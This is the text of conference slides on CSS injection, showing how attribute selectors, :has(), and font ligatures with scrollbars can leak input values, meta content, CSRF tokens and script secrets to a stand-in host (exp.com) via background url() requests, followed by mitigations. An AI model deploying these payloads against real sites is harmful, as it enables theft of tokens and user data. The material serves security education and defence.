Attacking web without JS - CSS injection

by Huli

Slide 1

Slide 1 text

Attacking web without JS CSS Injection Huli from Cymetrics / OneInﬁnity @ CYBERSEC 2022

Slide 2

Slide 2 text

About Huli • Security Researcher at Cymetrics / OneInﬁnity • CTF player at Water Paddler • https://blog.huli.tw/

Slide 3

Slide 3 text

Front-end Security

Slide 4

Slide 4 text

Front-end Security => XSS(Cross-Site Scripting)

Slide 5

Slide 5 text

Front-end Security => XSS(Cross-Site Scripting)

Slide 6

Slide 6 text

IE7 (15 years ago)

Slide 7

Slide 7 text

CSS injection => Steal data via CSS

Slide 8

Slide 8 text

CSS injection => Steal data via CSS How?

Slide 9

Slide 9 text

input[value^="a"]{ background: url("//exp.com?a"); }

Slide 10

Slide 10 text

CSS selectors input[value^="a"] // prefix input[value$="a"] // suffix input[value*="a"] // contains

Slide 11

Slide 11 text

Steal input value

Slide 12

Slide 12 text

Steal input value input[value^="a"]{ background: url("//exp.com?a"); }

Slide 13

Slide 13 text

Steal input value input[value^="a"] + input { background: url("//exp.com?a"); }

Slide 14

Slide 14 text

Steal input value

Slide 15

Slide 15 text

has: to the rescue form:has(input[value^="a"]) { background: url("//exp.com?a"); }

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

Steal meta content

Slide 18

Slide 18 text

Steal meta content meta[content^="a"] { background: url(//exp.com?a); }

Slide 19

Slide 19 text

Steal meta content meta[content^="a"] { background: url(//exp.com?a); }

Slide 20

Slide 20 text

Steal meta content meta { display: block; } meta[content^="a"] { background: url(//exp.com?a); }

Slide 21

Slide 21 text

Steal meta content meta { display: block; } meta[content^="a"] { background: url(//exp.com?a); }

Slide 22

Slide 22 text

Steal meta content meta[content^="a"] { background: url(//exp.com?a); }

Slide 23

Slide 23 text

Steal meta content meta, head { display: block; } meta[content^="a"] { background: url(//exp.com?a); }

Slide 24

Slide 24 text

No content

Slide 25

Slide 25 text

No content

Slide 26

Slide 26 text

Steal HackMD CSRF token

Slide 27

Slide 27 text

Steal HackMD CSRF token

Slide 28

Slide 28 text

Steal HackMD CSRF token HackMD Server

Slide 29

Slide 29 text

Steal HackMD CSRF token HackMD Server server?token=a

Slide 30

Slide 30 text

Steal HackMD CSRF token HackMD Server server?token=a Update content and

Slide 31

Slide 31 text

Steal HackMD CSRF token HackMD Server server?token=ab Update content and

Slide 32

Slide 32 text

Demo

Slide 33

Slide 33 text

Steal CSRF token != CSRF 😢

Slide 34

Slide 34 text

Steal any content var secret = "abc123"; Is it possible?

Slide 35

Slide 35 text

ligature https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

Slide 36

Slide 36 text

ligature

Slide 37

Slide 37 text

ligature + scroll bar script { width: 300px; display: block; font-family: "leak"; white-space: nowrap; overflow-x: auto; } script::-webkit-scrollbar { background: blue; } script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }

Slide 38

Slide 38 text

ligature + scroll bar

Slide 39

Slide 39 text

Mitigation • Sanitization • Content Security Policy • style-src • font-src • Check origin/referer header • Same-site cookie

Slide 40

Slide 40 text

Reference 1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf 2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/ 3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection 4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack- web-application/ 5. https://mksben.l0.cm/2021/11/css-exﬁltration-svg-font.html 6. https://github.com/masatokinugawa/css-exﬁltration-svg-font/

Slide 41

Slide 41 text

Q&A